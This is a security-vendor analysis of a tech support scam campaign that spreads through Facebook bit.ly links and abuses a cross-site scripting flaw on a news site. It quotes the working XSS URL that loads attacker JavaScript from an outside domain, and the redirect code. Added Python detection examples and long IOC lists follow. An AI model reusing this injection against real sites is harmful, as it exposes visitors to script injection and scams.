XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Malwarebytes Labs

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.

The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3-month period, suggesting that the links are rotated regularly to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection, which involves a Peruvian website (rpp[.]pe) that contains a cross-site scripting vulnerability (XSS) allowing for an open redirect. Threat actors love to abuse open redirects because they lend some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.
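To make the reflection concrete, the following is an added example (not code from the post, from Malwarebytes or from Grupo RPP): it decodes the quoted URL to show exactly what the search page receives in its q parameter, extracts the host of any externally loaded script hidden in the query, and contrasts a vulnerable reflection of the search term with one that HTML-encodes it. The URL is the defanged one from the post with a scheme added and a placeholder in place of the removed fbclid; the two render functions are hypothetical stand-ins for the site's search page, not its real code, and the refang step is needed because urlsplit rejects the bracketed "[.]" notation.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The defanged URL quoted in the post, with a scheme added for parsing and a
# placeholder where the post removed the real fbclid value.
SAMPLE_URL = ("https://rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/"
              "?zg1lx5u0.js%27%3E%3C/script%3E&fbclid=PLACEHOLDER")

# Matches an opening <script ...> tag that carries a src attribute and captures the URL.
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def refang(url: str) -> str:
    """Turn the defanged 'rpp[.]pe' notation back into a URL urlsplit will accept."""
    return url.replace("[.]", ".")


def reflected_query(url: str) -> str:
    """Return the percent-decoded 'q' value exactly as the search page would receive it."""
    query = urlsplit(refang(url)).query
    return parse_qs(query, keep_blank_values=True).get("q", [""])[0]


def injected_script_sources(url: str) -> list:
    """Hosts of any external scripts smuggled in through query parameters."""
    query = urlsplit(refang(url)).query
    hosts = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:  # parse_qs has already percent-decoded each value
            for src in SCRIPT_SRC_RE.findall(value):
                hosts.append(urlsplit(src).netloc.lower() or src)
    return hosts


def render_search_page(query: str) -> str:
    """Hypothetical vulnerable pattern: the search term is reflected into HTML
    unencoded, so a '<script src=...>' in the parameter becomes live markup."""
    return f"<h1>Resultados para: {query}</h1>"


def render_search_page_safe(query: str) -> str:
    """Hypothetical hardened pattern: html.escape converts angle brackets and
    quotes into entities, so the same input is displayed as text and never runs."""
    return f"<h1>Resultados para: {html.escape(query, quote=True)}</h1>"


if __name__ == "__main__":
    payload = reflected_query(SAMPLE_URL)
    print("injected script hosts:", injected_script_sources(SAMPLE_URL))
    print("vulnerable:", render_search_page(payload))
    print("hardened:  ", render_search_page_safe(payload))
```

Output encoding is the fix that removes the bug; a Content-Security-Policy that does not allow scripts from arbitrary origins would additionally have stopped the external script from loading even while the reflection existed.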

We reported this issue to Grupo RPP but have not heard back at the time of publication.

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript file is returned for traffic that does not qualify).

The code (shared above) loads the browser locker landing page from one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.

Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.

This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.
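For defenders reviewing proxy or DNS logs, the stages described above (shortener, XSS redirect through the news site, cloaking domain, browlock landing page on a newer TLD with the phone number in the nr parameter) can be recognised mechanically. The following is an added example, not code from the post or from Malwarebytes: it classifies each request and groups hits per client so the whole chain is visible for one victim. The log format, the client addresses and the timestamps are constructed; the cloaking domains, TLD list and the phone number come from the post, and the landing-page line forwards only a placeholder fbclid where the real redirect appends the entire original query string.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# From the post: TLDs of the disposable browlock domains and the six cloaking
# domains (refanged here so they compare against parsed hostnames).
BROWLOCK_TLDS = {"casa", "site", "space", "club", "icu", "bar"}
CLOAKING_DOMAINS = {"buddhosi.com", "joinspinclass.com", "suddhosi.com",
                    "thourwiringus.com", "totalgodin.com", "tuoliushigao.com"}
PHONE_RE = re.compile(r"^\d{3}-\d{3}-\d{4}$")
TOLL_FREE_PREFIXES = ("800", "833", "844", "855", "866", "877", "888")

# Constructed proxy log (not from the post): "timestamp client url" per line.
# The bit.ly path and fbclid values are placeholders.
SAMPLE_LOG = """\
2020-09-01T10:00:01Z 10.0.0.5 https://bit.ly/PLACEHOLDER
2020-09-01T10:00:02Z 10.0.0.5 https://rpp.pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi.com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid=PLACEHOLDER
2020-09-01T10:00:03Z 10.0.0.5 https://buddhosi.com/210c/?zg1lx5u0.js
2020-09-01T10:00:04Z 10.0.0.5 https://BernetteJudeTews.club/home/anette/?nr=855-472-1832&fbclid=PLACEHOLDER
2020-09-01T10:00:05Z 10.0.0.7 https://example.com/news
"""


def classify(url: str):
    """Return a dict describing which stage of the chain a URL belongs to, or None."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    tld = host.rsplit(".", 1)[-1]
    query = parse_qs(parts.query)
    if host == "bit.ly":
        return {"stage": "shortener", "host": host}
    # A <script tag inside the query string is the XSS-as-open-redirect pattern.
    if "<script" in unquote(parts.query).lower():
        return {"stage": "xss-redirect", "host": host}
    if host in CLOAKING_DOMAINS:
        return {"stage": "cloaking", "host": host}
    # Browlock landing pages carry the scam phone number in the nr parameter.
    phone = query.get("nr", [""])[0]
    if tld in BROWLOCK_TLDS and PHONE_RE.match(phone):
        return {"stage": "browlock", "host": host, "phone": phone,
                "toll_free": phone.startswith(TOLL_FREE_PREFIXES)}
    return None


def triage(log_text: str) -> dict:
    """Group flagged requests by client address so each victim's chain reads top to bottom."""
    chains = {}
    for line in log_text.splitlines():
        timestamp, client, url = line.split(" ", 2)
        hit = classify(url)
        if hit:
            hit["ts"] = timestamp
            chains.setdefault(client, []).append(hit)
    return chains


if __name__ == "__main__":
    for client, hits in triage(SAMPLE_LOG).items():
        print(client)
        for hit in hits:
            print("  ", hit["ts"], hit["stage"], hit["host"], hit.get("phone", ""))
```

The phone number extracted from the nr parameter is the most durable pivot in this chain: the bit.ly links and landing domains rotate constantly, but the numbers (listed in the IOCs) are reused across many domains, so matching on them catches new landing pages the domain list has not caught up with.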

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.

Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links

bit[.]ly/2BnL1gb
bit[.]ly/2BT9fyU
bit[.]ly/2Ci8vU7
bit[.]ly/2CmSeNo
bit[.]ly/2CYEQ2V
bit[.]ly/2D1Xt64
bit[.]ly/2Do8rTA
bit[.]ly/2DoLMGh
bit[.]ly/2DpBAO3
bit[.]ly/2W5TLOW
bit[.]ly/2WggcRI
bit[.]ly/2Whuz8f
bit[.]ly/3ffMoLv

bit[.]ly/2XylAQS
bit[.]ly/2YQ6Nll
bit[.]ly/2YUEJh1
bit[.]ly/2Z8u2Y6
bit[.]ly/2Zf9f5g
bit[.]ly/30B8frz
bit[.]ly/30OBrge
bit[.]ly/312yDMe
bit[.]ly/2E4iPQg
bit[.]ly/2EVqXDf
bit[.]ly/2NJPNad
bit[.]ly/2SKSKtG
bit[.]ly/2W0EVJx

bit[.]ly/313QfpY
bit[.]ly/31nuzVZ
bit[.]ly/33j18GQ
bit[.]ly/33RHphZ
bit[.]ly/33TnMGp
bit[.]ly/33U4KzW
bit[.]ly/36XhNlF
bit[.]ly/39kxqT9
bit[.]ly/39Lpf2I
bit[.]ly/3a1vjnz
bit[.]ly/3ehykAR
bit[.]ly/3eQ8Rib
bit[.]ly/3fDTxpu

bit[.]ly/3fNbwdP
bit[.]ly/3gfDRJw
bit[.]ly/3gi7sTi
bit[.]ly/3gSXmbh
bit[.]ly/3gvG3gI
bit[.]ly/3hlBUvE
bit[.]ly/3iLGu8b
bit[.]ly/3jcvfVC
bit[.]ly/3jk66sh
bit[.]ly/3jU5Q3Z
bit[.]ly/3kgIwxF

Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains

abagailliondaye[.]site
addiatraciedur[.]casa
adianaeadmundfaunia[.]casa
adriaensherveymanson[.]space
aidadarnallkondon[.]casa
ailynhoratiowallford[.]space
akselholm[.]space
alanaweekes[.]casa
alexandervolodin[.]site
alexaschulteisz[.]space
alexinasandersjeddy[.]casa
alexinemunroelanni[.]space
alineorbadiahbakerman[.]space
allegradoyclaudette[.]space
almedacorbiemyrta[.]club
alondramendez[.]space
aloysiapatbergwall[.]space
altapippomarjory[.]casa
alvenystrom[.]site
alysonbartolemohaze[.]casa
amandarocha[.]site
amandisamsonpattin[.]space
ameliabernays[.]bar
ameliebrown[.]icu
amiesinclair[.]space
anallesewolfiecacie[.]space
andreachrissyglaudia[.]space
andrewvasiliev[.]space
angelicajohnsen[.]casa
angelilaireberns[.]space
annadianakelleybowra[.]space
annalisearchylandau[.]casa
annicecurreyinglebert[.]site
anthewaltonbacon[.]casa
anupakarinen[.]space
aputsiaqjosefsen[.]space
arlienerutgeremmey[.]site
arlindapaulotrix[.]casa
ashlyjdavielonee[.]site
audricpanetier[.]space
aurooragabrielepahl[.]site
auroraaylmarosmo[.]casa
avalundstrom[.]casa
balazsforgacs[.]space
barbialbiedanit[.]space
beatrizmartins[.]space
beaurbandonoho[.]casa
belindapattinyorick[.]site
benbaxter[.]casa
berenicebrighamklug[.]site
bertapisano[.]casa
bertharockwellgans[.]space
bertinarothesmerolda[.]site
bertinebrendintremml[.]casa
bertyemmanuelbeaufert[.]site
bettineallynnoemi[.]casa
billyemichelethacher[.]casa
billygreen[.]casa
blaireredemalee[.]space
boriskapalfi[.]casa
caitlinluigigypsie[.]casa
caitlinpetersen[.]space
callumlittle[.]site
calvinbridges[.]club
careyheinrikornstead[.]space
carlaellwoodobadiah[.]casa
carlyejoaquinfrederica[.]site
carlynnshelldorey[.]space
carmeltristanjeremiah[.]casa
carolinepeadarstutman[.]space
carynkristoforopleione[.]site
catharinaewansouthworth[.]space
celiechristofferrochester[.]casa
celinagrahamtollmann[.]site
charlesthornton[.]bar
charleyferguson[.]space
cherilynrolferoselin[.]casa
cherishhurleyburrus[.]casa
cherlyncourtgrannias[.]site
cherylkristopherannice[.]site
chicasackville[.]casa
chicovangriensven[.]site
christacullinclem[.]space
christinehermansen[.]space
christoperkim[.]club
chrysaheinrikromo[.]space
cibranjasso[.]casa
cilkabuddieradmen[.]space
clarettanicolahannus[.]site
clareykonstantinelipkin[.]site
clariangieeddi[.]space
codieriewebb[.]site
colenerodricksipple[.]space
colettenildelaney[.]space
collycazlal[.]club
constantachaddcoleen[.]space
coralineottomalcom[.]space
cornelagregoireriannon[.]casa
correnaosbornwatters[.]space
corriethaddusnero[.]casa
courtnaycullanartimas[.]space
courtneydunn[.]site
courtneyshaw[.]casa
csabatotth[.]space
cybilloatesotho[.]club
cynthiejoshuagoetz[.]casa
dagurarnbjarnarson[.]space
daniaumbertobraunstein[.]site
darellecorteldridge[.]space
darlaleopoldlandri[.]space
darlenegarcia[.]space
deanstreeten[.]club
debbynoelfugazy[.]casa
diederikfaro[.]casa
ditajaridhancock[.]space
dominicbyrne[.]club
donaldking[.]casa
donatilavela[.]casa
doniellejarrettherwick[.]space
doratiboldjapeth[.]casa
dorelleolinsiusan[.]casa
dorenerossclemente[.]casa
dorisferguson[.]site
dorriestubridie[.]casa
dronafeliziowallace[.]club
dyannrichalona[.]site
eberardobustamante[.]casa
eboneebritseltzer[.]space
edittafanucci[.]space
eduardasantos[.]casa
edwardmarr[.]casa
elbertinawaymalina[.]site
electratobinlori[.]space
elinorecyrusrosalind[.]site
elisabetmahmudziguard[.]casa
ellasaari[.]space
ellereid[.]site
ellihermannsheldon[.]casa
emmalynhenriwinsor[.]site
erdagarephenica[.]club
erminiekurtisberard[.]site
ethelinemuffinpierrette[.]casa
ethelynezekielpepito[.]space
evagorbunova[.]space
evascarfe[.]space
evelinemikolviveca[.]space
ezinetshishani[.]casa
fancieogdanwanyen[.]site
fannymackkellby[.]site
fatramcharan[.]icu
feikjewestenbrink[.]icu
felicytasobczak[.]space
felixkomarov[.]site

fiannkipparisaac[.]casa
filidelucianrus[.]casa
floraabrahamsson[.]site
florisburrparadies[.]space
franceskint[.]casa
frankmejias[.]space
freddieholden[.]space
fredrikigland[.]site
frigyesbakos[.]club
fulcovangemert[.]casa
gabrielduffy[.]casa
gabriellacunneen[.]club
gabriellamarsden[.]space
gaynorchevaliermollie[.]space
georgecreswick[.]icu
germaisenia[.]uno
gertiereggyun[.]casa
gianninafonville[.]store
gillianlindseymobley[.]casa
ginnikipvedis[.]casa
giudittademetrestuppy[.]site
giulioferrari[.]club
glennconantkaete[.]casa
greerjorgangarcon[.]casa
gretchenmorgenfrans[.]casa
guineveremorgenphilipson[.]space
gundolphochubbbaggins[.]space
gusursongerhard[.]space
gwendolenworthcower[.]club
hamzenolet[.]space
hanabinkykasevich[.]casa
hannahkaur[.]space
harriottheodoricmartinez[.]space
heidiingamarkaenel[.]casa
hollyhardy[.]space
hopechaddbrogle[.]site
hyacinthreuvengronseth[.]casa
ileanaroryfarika[.]casa
ilonayusupova[.]space
ilsepiirto[.]casa
ingebergrudyjacintha[.]space
ingridharlinaekerly[.]casa
iolandecreightonnona[.]space
iritapietreklow[.]space
isabelaalmeida[.]site
isembardgreenhand[.]store
issysydneycharmain[.]site
isumbrasbrandagamba[.]club
ivalufilemonsen[.]casa
ivaluhansen[.]casa
ivalularsen[.]site
iversoreide[.]site
jacobsutherland[.]site
jacquelinehampson[.]space
jadechadzoara[.]casa
jaimecarliedaye[.]casa
jakebooth[.]club
jamesmiller[.]casa
jamesspofforth[.]club
jamieumstead[.]uno
janholm[.]site
jareddubose[.]space
jaromirbrynda[.]casa
jaspercaraballo[.]casa
jeanellejermainoleg[.]casa
jeannabroderickgrunenwald[.]casa
jenniferreed[.]club
jenninelammondtorto[.]site
jennovankooij[.]icu
jerrileeharrydyun[.]casa
jesperkristoffersen[.]site
jessamynfreemonhibben[.]casa
jessisylvesterkenison[.]space
jillaynemagnumallys[.]space
joaniealisteratwekk[.]casa
joanywilting[.]casa
joellydaltonhamel[.]site
joeyrudolfrebhun[.]casa
johnapascaleikey[.]casa
johnclark[.]icu
joinspinclass[.]com
jordannaholttakken[.]casa
jorgritter[.]space
josjasalah[.]site
juansmotherman[.]club
judiecosimoprudence[.]site
julieravn[.]space
juliettaheywooddunham[.]casa
kacyandershugon[.]site
kacybenoitarley[.]space
kajaaurthurzebulen[.]space
kalmandobos[.]site
karenbrands[.]casa
karitasvalberg[.]site
karlenronniesaidel[.]casa
karolgraememaye[.]space
kasperronning[.]casa
kasszaredphelan[.]space
katerinechuchowinston[.]space
katherinacedricbrynne[.]site
katinarooseveltmattox[.]space
katrinebrandt[.]casa
katushapallardolino[.]space
kauecavalcanti[.]site
kayleeamorymafalda[.]casa
keadaly[.]club
kerrychavez[.]icu
kessiaharonwentworth[.]space
kingapawlak[.]space
kippieeliasrachaba[.]space
kirakipplek[.]space
kirstialechulbard[.]space
kolosszegedi[.]site
kristelichaboderina[.]space
kristennowellsholley[.]casa
kristesylvesterblossom[.]casa
kristinejacobsen[.]site
krysiawojciechowska[.]casa
krystaltommyabell[.]casa
kylaasherrosenstein[.]space
kylamontishetrit[.]casa
laneydavinangell[.]site
larissasebastienhubie[.]space
laurelhewbasset[.]site
lauriannegermaynealithia[.]casa
lauriannetobyevalyn[.]casa
leannaralfpicardi[.]club
lechoslawczarnecki[.]site
lesliestorey[.]casa
lettiiorgoscathe[.]space
lettitracegow[.]casa
liaonio[.]site
liatimoteojacqui[.]casa
livandrea[.]icu
loisepatrickardie[.]space
lonnibasiliozirkle[.]casa
lorajerriprimavera[.]space
lorenzagiovannigiacomo[.]site
loriannalodovicoradloff[.]club
lorrinrodmignonne[.]space
lucievanrinsum[.]club
luisbarros[.]casa
lynseybrunotatman[.]casa
mabwinfrededelsten[.]space
maddyjarridolnee[.]site
madelindarrelbruyn[.]casa
marcellinevidovicmilinda[.]casa
marcoklug[.]casa
margarettedukieaeriel[.]space
margitfreedmangrider[.]site
margretedgarbabbie[.]casa
margretglynnadelice[.]casa
mariamnilsson[.]site

mariapfaff[.]casa
mariuslovstrom[.]casa
mariuszdudek[.]site
marnizebulonmarchese[.]space
masonpatel[.]space
mathildacaseopportina[.]site
maurakonradebenezer[.]club
mauritznystrom[.]space
maximinovaldes[.]casa
meghanncreightonoster[.]space
meralvangeer[.]space
merielbondonbelldas[.]space
merisbuironstatis[.]casa
merrillingeroscar[.]club
merryfabioavruch[.]space
meyaakesson[.]casa
mialeistad[.]space
mieszkoczarnecki[.]space
mikaelenoksen[.]site
milissentflorychard[.]casa
miriamvernesopher[.]space
mirnaandreyfischer[.]casa
mollieyveswestfall[.]site
monahreamonnjacintha[.]casa
morganajehukinchen[.]site
muirenolanhaydon[.]site
myrtleruss[.]casa
nanagal[.]icu
naomibolton[.]casa
nattybrendonleverett[.]casa
nedaholmesmilly[.]site
neddaboneamaras[.]club
nessiebogeyeugenio[.]site
nickieearliehelbona[.]site
nissaalfonsealexis[.]site
nixieholtadamski[.]space
noravestre[.]site
norbertschuil[.]casa
noreanlarsornas[.]casa
nursellamo[.]space
odelladevlinaleksandr[.]space
odettafalknerlenni[.]site
oliverraaen[.]space
olliemaclean[.]casa
omarbazhaev[.]space
paolaverhoef[.]space
peggyakselsmalley[.]site
penelopaelbertsonny[.]space
philgiordanolibbey[.]site
pongorfoldesi[.]casa
poppyinglissparke[.]casa
poulkristensen[.]space
quinnagustezandt[.]casa
rafinelisse[.]bar
ranabramran[.]casa
raquelaeduinochiles[.]casa
raymondsmith[.]casa
rayyangordon[.]casa
reavictorcherrita[.]casa
reynirjonatansson[.]site
reynirottosson[.]space
rianonkentonlira[.]space
ricagaylebernie[.]site
ricidewittflatto[.]space
riviboyceyvento[.]site
rivkahmayneazpurua[.]space
roannefrancoisgenny[.]space
roannestanislausolimpia[.]casa
robertfoley[.]space
robertsaunders[.]casa
robertweaver[.]space
ronaldestep[.]casa
ronnymortiesanburn[.]casa
rosabelleellswertheisenhart[.]casa
roseanniveadlay[.]casa
rosejaymeraouf[.]space
rosemondelelandneil[.]site
rupertaeddiefalk[.]space
sabrinagaertner[.]space
salviamugwort[.]space
samamerigoaldridge[.]site
samarialucienquinn[.]casa
samarknape[.]uno
samukatorok[.]space
sandraglebova[.]space
sanyaimmink[.]icu
sareeellereypenland[.]casa
savinareinwaldsteffen[.]site
scarlettlaycatherina[.]site
shannonmanfredoctave[.]site
shaynefrancklynwynne[.]site
sheelafarrisgare[.]casa
sheila-kathryntysonlatia[.]club
sheilayork[.]space
sherriehankcha[.]casa
sherriraddiechester[.]casa
sibyllepearcelaney[.]site
silviearaldorory[.]space
simonefreitag[.]club
sisilehoweyivanah[.]casa
siskolaatikainen[.]casa
solsausamov[.]space
starernestmcmillan[.]site
suddhosi[.]com
suewaldotacklind[.]casa
suomariihijarvi[.]casa
suzywordenmycah[.]casa
sylviakroon[.]site
tallydewsheley[.]club
taniburnabydarrill[.]casa
tanyarayhasty[.]casa
tedraadottinger[.]casa
teodorademetripettifer[.]casa
terrinathanaelgahl[.]space
theafrederiksen[.]space
thelmaantoniusibrahim[.]space
theresawalsh[.]icu
tienanevillepetrine[.]casa
tillyby[.]club
tillyheerson[.]space
timurvida[.]space
tinesidneefiedling[.]site
tomawyndhamrudolfo[.]space
topivuorinen[.]site
tordamdal[.]site
totalgodin[.]com
toussaintjobin[.]site
trinemathiasen[.]site
trudienehemiahblodget[.]space
trungbliek[.]site
utairvinshirk[.]space
veganystrom[.]space
veroniquegilbertonickey[.]casa
vesteinnyngvason[.]space
vibrockienorina[.]casa
vincenzokaur[.]space
vinniechrissiearlynne[.]site
vioarbirgisson[.]space
vitoriaoliveira[.]casa
wallislonkerrill[.]club
wilcomesandheaver[.]site
willhighett[.]club
williamsimonsen[.]casa
wynnedelmoremaison[.]space
wynnielorenprisca[.]casa
wynnyjobgratt[.]space
xavierholroyd[.]club
yingahmad[.]space
yoshikojaeheisser[.]casa
zakariaeotter[.]space
zomborgyarmathi[.]casa
zorinetownspiegelman[.]casa

Phone numbers

833-801-7232
844-762-9462
844-762-9467
844-793-6869
844-793-8637
844-794-5246
844-794-6678
844-794-6786
844-796-2946
844-833-8289

844-909-2777
855-241-4508
855-470-1718
855-470-1720
855-470-1721
855-470-1724
855-472-1830
855-472-1832
855-472-1833
855-885-0741

855-472-1840
855-472-1844
855-626-2563
855-805-1138
855-805-1278
855-805-1285
855-827-2595
855-827-3045
855-885-0784
855-885-0818

855-885-0830
855-885-0833
877-429-1222
888-597-1444
888-851-3768
888-851-5754
888-865-2158
888-866-6127
888-866-6299

The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.
